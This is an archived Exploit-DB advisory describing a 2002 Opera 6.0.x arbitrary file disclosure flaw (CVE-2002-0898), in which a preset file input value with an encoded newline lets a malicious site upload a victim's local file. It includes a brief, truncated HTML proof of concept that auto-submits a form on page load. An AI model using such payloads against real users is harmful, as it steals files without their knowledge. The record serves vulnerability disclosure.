Opera 6.0.1/6.0.2 - Arbitrary File Disclosure Vulnerability

ID EDB-ID:21483
Type exploitdb
Reporter GreyMagic Software
Modified 2002-05-27T00:00:00


Opera 6.0.1/6.0.2 Arbitrary File Disclosure Vulnerability. CVE-2002-0898. Remote exploit for windows platform

                                            source: http://www.securityfocus.com/bid/4834/info

A vulnerability has been reported in Opera 6.01/6.02. The vulnerability is related to handling of the 'file' HTML input-type. It is possible for a server to set the file value, while fooling Opera into thinking no file has been specified. This is possible if the filename is appended with the string "
". This HTML-encoded newline character will cause the browser to believe that no value has been set. Consequently, the form will be submitted and the specified file will be uploaded to the server. This may occur without knowledge or consent of the victim user.

Exploitation of this vulnerability allows for malicious webmasters to obtain arbitrary files from client systems. 

<body onload="document.secForm.submit()">
<form method="post" enctype="multipart/form-data" action="recFile.php"
<input type="file" name="expFile" value="c:\test.txt